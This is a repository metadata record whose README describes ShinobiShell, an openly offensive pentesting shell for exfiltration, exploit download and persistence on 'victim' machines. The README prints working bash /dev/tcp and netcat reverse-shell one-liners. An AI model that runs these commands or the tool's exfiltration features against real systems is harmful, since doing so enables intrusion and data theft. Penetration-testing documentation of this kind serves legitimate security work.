{"id":21307214,"url":"https://github.com/dotnetrussell/shinobishell","last_synced_at":"2026-04-18T01:31:24.888Z","repository":{"id":116077463,"uuid":"176344001","full_name":"DotNetRussell/ShinobiShell","owner":"DotNetRussell","description":"An experimental shell that handles file exfiltration, exploit injection and various other obnoxious tasks.","archived":false,"fork":false,"pushed_at":"2020-08-09T17:17:37.000Z","size":27,"stargazers_count":12,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-08-12T09:32:37.956Z","etag":null,"topics":["bug-bounty","bugbounty","hacking","hacking-tool","info-sec","information-security","infosec","infosectools","linux","penetration-testing","penetration-testing-tools","python","python3","redteam","shell"],"latest_commit_sha":null,"homepage":"https://www.DotNetRussell.com","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/DotNetRussell.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-03-18T18:12:50.000Z","updated_at":"2025-07-12T15:53:17.000Z","dependencies_parsed_at":null,"dependency_job_id":"6e0e4cfd-df5e-4e2f-bd7b-a00a4c75b8bb","html_url":"https://github.com/DotNetRussell/ShinobiShell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/DotNetRussell/ShinobiShell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DotNetRussell%2FShinobiShell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DotNetRussell%2FShinobiShell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DotNetRussell%2FShinobiShell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DotNetRussell%2FShinobiShell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/DotNetRussell","download_url":"https://codeload.github.com/DotNetRussell/ShinobiShell/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/DotNetRussell%2FShinobiShell/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273064452,"owners_count":25039261,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-31T02:00:09.071Z","response_time":79,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bug-bounty","bugbounty","hacking","hacking-tool","info-sec","information-security","infosec","infosectools","linux","penetration-testing","penetration-testing-tools","python","python3","redteam","shell"],"created_at":"2024-11-21T16:30:24.200Z","updated_at":"2026-04-18T01:31:19.853Z","avatar_url":"https://github.com/DotNetRussell.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# ShinobiShell\nAn experimental shell that handles file exfiltration, exploit injection and various other obnoxious tasks.\n```\nusage: PROG [options]\n\nShinobi shell is a shell specifically designed to make exfiltration, proxying,\npersistance and other pentesting actions easier.\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -a, --autoload\tListens for a incoming shell. Then autoloads shinobi shell onto the target\n  -t, --ttyCheat        Shows tty shell cheat sheet (need a tty shell for shinobi shell to work)\n  -c, --connect         Flag that indicates a reverse shell connection (use this on victim machine)\n  -l LISTEN, --listen LISTEN\n                        Starts Shinobi Shell listener on port passed in\n  -k, --key             Will create an encrpyted tunnel if encrpytion libs available\n  -r SERVERADDRESS, --serveraddress SERVERADDRESS\n                        Local IP Address used for universal reverse shell\n                        handler (optional - use if different than default)\n```\n## Start your server first:\n\n### Server (Attacking box) \n`./shinobishell.py -l 4443 -k`\n\n`-l` Port server will listen on\n\n`-k` Requesting an encrypted tunnel server (optional but if used, required by all connections)\n\n\n## OPTION 1: Run Shinobi Shell manually on the victim machine\n\nClient (Penetrated box) \n`./shinobishell.py -c -k ` \n\n`-c` Connect back to a server\n\n`-k` Try and make an encrytped tunnel\n\nFor both server and client, you'll be prompted for a password when using `-k`\n\nFor `-c` you will be prompted at run time for the server address\n\nBoth `-c` and `-k` were moved to runtime inputs to prevent leaking attacking machine address and key in bash history\n\n## OPTION 2: Start a Shinobi Shell listener on your attacking machine and send it a shell\n\n### Attacking Machine\n\n`./shinobishell.py -a`\n\u003e Shinobi Tunnel Plaintext ~~ Be aware\n\n\u003e Which port to listen on: 1000\n\n\u003e What is the ShinobiServer address:port combination: 127.0.0.1:443\n\n\n### Victim Machine\n\nSend a reverse shell \n\n(tested and known to work)\n\n`/bin/bash -i \u003e\u0026 /dev/tcp/127.0.0.1/1000 0\u003e\u00261`\n\n`nc 127.0.0.1 1000 -e /bin/bash`\n\n`nc 127.0.0.1 1000 -e /bin/sh`\n\n\n## -h --help Help output\n\n```\nShinobi Shell v1.0\nAuthor: Anthony Russell\nContact: Twitter @DotNetRussell\nBlog: https://DotNetRussell.com  (don't hack me bro)\n\nCommands:\n\nhelp -                      displays help information\nmachineinfo -               displays a series of machine variables to help with priv esc\nsearchsploit -              \u003csearch text\u003e sends a searchsploit command back to your attacking machine and returns the results through shinobi tunnel\nexfil \u003cfile name\u003e -         exfiltrates a file back to your attacking machine via shinobi tunnel\nssdownload \u003cexploit path\u003e - downloads a search sploit exploit from your attacking machine\ndownload \u003curl\u003e -            does a wget for your file on your attacking machine and then transfers it to you over shinobi tunnel\nlinenumdownlods -           linenum.sh to the Shinobi Server and then transfers it back to the client\nsuid3num -\t\t    downloads suid3num.py to the Shinobi server and then transfers it back to the client\n\nLoot Chest:\n\nloot store \u003ckey\u003e \u003cvalue\u003e -  stores a key value pair in your loot chest\nloot \u003ckey\u003e -                gets a loot value\nloot show -                 shows everything in loot chest\n\nNOTE: Loot chest auto syncs with attacking machine\n\t\nAuto Aliases\nlsa == ls -la\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdotnetrussell%2Fshinobishell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdotnetrussell%2Fshinobishell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdotnetrussell%2Fshinobishell/lists"}